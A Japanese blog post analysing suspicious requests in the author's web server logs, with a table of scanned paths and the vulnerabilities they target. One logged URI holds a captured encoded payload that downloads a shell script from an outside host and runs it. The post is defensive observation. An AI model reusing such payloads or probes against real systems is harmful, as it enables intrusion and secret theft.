あけましておめでとうございます。
公開している web サーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
PHPUnitのevalをリモート実行
PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GeoServerの脆弱性
GeoServer の深刻な脆弱性 CVE-2023-35042 が FIX:RCE 攻撃が観測されている – IoT OT Security News
/geoserver/web/
Cisco 製 Cisco IOS XE の Web UI の脆弱性
Cisco 製 Cisco IOS XE の Web UI の脆弱性について(CVE-2023-20198 等) | 情報セキュリティ | IPA 独立行政法人 情報処理推進機構
/webui/
Spring Frameworkの脆弱性
Spring FrameworkのSpring Cloud Gatewayという機能の脆弱性に関する通信みたいです。
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability
/actuator/gateway/routes
たぶん強制ブラウジング
../../proc/
リモートファイルインクルージョンの脆弱性
DataLife Engine (DLE) の engine/api/api.class.php には、PHP リモートファイルインクルージョンの脆弱性を狙った通信だと思われます。
JVNDB-2009-003705 - JVN iPedia - 脆弱性対策情報データベース
/class.api.php
jQueryの特定のバージョンの脆弱性を狙った通信
jQueryの特定のバージョンを使っていないかの調査の通信。
/jquery-3.3.1.min.js
不審な通信の一覧
| uri | count |
|---|---|
| / | 10162 |
| /.env | 4815 |
| /sendgrid/.env | 4513 |
| /robots.txt | 1449 |
| //.env | 854 |
| //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 834 |
| /sw.js | 389 |
| /favicon.ico | 325 |
| /wp-login.php | 256 |
| /ads.txt | 234 |
| * | 150 |
| mstshash=Administr | 115 |
| /app-ads.txt | 85 |
| //pagead2.googlesyndication.com/pagead/js/adsbygoogle.js | 81 |
| /index.xml | 80 |
| /manifest.js | 79 |
| /.git/config | 67 |
| /webui/ | 59 |
| /geoserver/web/ | 57 |
| /actuator/gateway/routes | 50 |
| ../../proc/ | 49 |
| /wp-includes/class.api.php | 43 |
| /wp-content/uploads/class.api.php | 43 |
| /wp-content/class.api.php | 43 |
| /images/class.api.php | 43 |
| /class.api.php | 43 |
| /.well-known/pki-validation/class.api.php | 43 |
| /.well-known/class.api.php | 43 |
| /.well-known/acme-challenge/class.api.php | 43 |
| /.tmb/class.api.php | 43 |
| //stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js | 39 |
| //cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js | 39 |
| //ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js | 39 |
| /c | 37 |
| /post/wp-login.php | 36 |
| /sellers.json | 34 |
| /wp-includes/widgets/include.php | 31 |
| /wp-includes/images/include.php | 31 |
| /wp-content/plugins/core-plugin/include.php | 31 |
| /wp-content/plugins/WordPressCore/include.php | 31 |
| /api/.env | 30 |
| /$%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27echo%20dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw%2BIi9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA%2BJjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM%2BJi0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK%7Cbase64%20-d%7Cbash%27%29.start%28%29%22%29%7D/ | 30 |
| /laravel/.env | 28 |
| /boaform/admin/formLogin | 26 |
| /wp-content/ | 25 |
| /core/.env | 25 |
| /autodiscover/autodiscover.json?@zdi/Powershell | 24 |
| /.well-known/security.txt | 24 |
| /style.php | 23 |
| /b0.php | 23 |
| /.well-known/pki-validation/x.php | 23 |
| /.well-known/fierzashell.php | 23 |
| /app/.env | 22 |
| /local/.env | 21 |
| /info.php | 21 |
| /_profiler/phpinfo | 20 |
| /inputs.php | 19 |
| \xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x13\xC0\x09\xC0\x14\xC0 | 18 |
| /wp-includes/ | 18 |
| /wp-content/uploads/ | 18 |
| /wp-content/themes/ | 18 |
| /wp-content/plugins/ | 18 |
| /wp-admin/ | 18 |
| /css/ | 18 |
| /actuator/health | 18 |
| /GWqN | 18 |
| /Ep1v | 18 |
| /.well-known/pki-validation/ | 18 |
| /.well-known/acme-challenge/ | 18 |
| /.well-known/ | 18 |
| /+CSCOE+/logon.html | 18 |
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 17 |
| /manage/account/login | 16 |
| /logon.htm | 16 |
| /login.jsp | 16 |
| /cgi-bin/login.cgi | 16 |
| /admin/index.html | 16 |
| /admin/config.php | 16 |
| /admin/.env | 16 |
| /.well-known/traffic-advice | 16 |
| 7 | 14 |
| /dns-query | 14 |
| /crm/.env | 14 |
| /aab8 | 14 |
| /web/.env | 13 |
| /phpinfo.php | 13 |
| /index.php | 13 |
| /apps/.env | 13 |
| /apple-touch-icon.png | 13 |
| /apple-touch-icon-precomposed.png | 13 |
| /shared/.env | 12 |
| /manager/html | 12 |
| /backend/.env | 12 |
| /HNAP1 | 12 |
| /.well-known/assetlinks.json | 12 |
| /.well-known/apple-app-site-association | 12 |
| /public/.env | 11 |
| /phpmyadmin/index.php | 11 |
| /chosen.php?p= | 11 |
| /cf_scripts/scripts/ajax/ckeditor/ckeditor.js | 11 |
| /application/.env | 11 |
| /ReportServer | 11 |
| /wp-content/themes/twenty/twenty.php | 10 |
| /version | 10 |
| /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ | 10 |
| /sdk | 10 |
| /portal/redlion | 10 |
| /hudson | 10 |
| /druid/index.html | 10 |
| /aws.env | 10 |
| /aaa9 | 10 |
| /wp-content/.env | 9 |
| /wp-admin/includes/themes.php | 9 |
| /woh.php | 9 |
| /t4 | 9 |
| /systembc/password.php | 9 |
| /src/.env | 9 |
| /script/.env | 9 |
| /old/.env | 9 |
| /login | 9 |
| /index.jsp | 9 |
| /contact | 9 |
| /audio/.env | 9 |
| /admin/ | 9 |
| /admin.php | 9 |
| /ab2h | 9 |
| /ab2g | 9 |
| /404.php | 9 |
| /.well-known/acme-challenge/atomlib.php | 9 |
| /.vscode/sftp.json | 9 |
| \x00\x00BBBB\xBA\x8C\xC1\xABDAAA | 8 |
| /www/.env | 8 |
| /wp-admin/.env | 8 |
| /vendor/.env | 8 |
| /system/.env | 8 |
| /sites/all/libraries/mailchimp/.env | 8 |
| /sitemaps.xml | 8 |
| /site/.env | 8 |
| /protected/.env | 8 |
| /new/.env | 8 |
| /manager/text/list | 8 |
| /library/.env | 8 |
| /jquery-3.3.1.min.js | 8 |
| /is-bin | 8 |
| /fw6I | 8 |
| /database/.env | 8 |
| /config.json | 8 |
| /conf/.env | 8 |
| /cgi-bin/.env | 8 |
| /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab | 8 |
| /blog/.env | 8 |
| /base/.env | 8 |
| /app/config/.env | 8 |
| /Visu/ens/events | 8 |
| /.well-known/gpc.json | 8 |
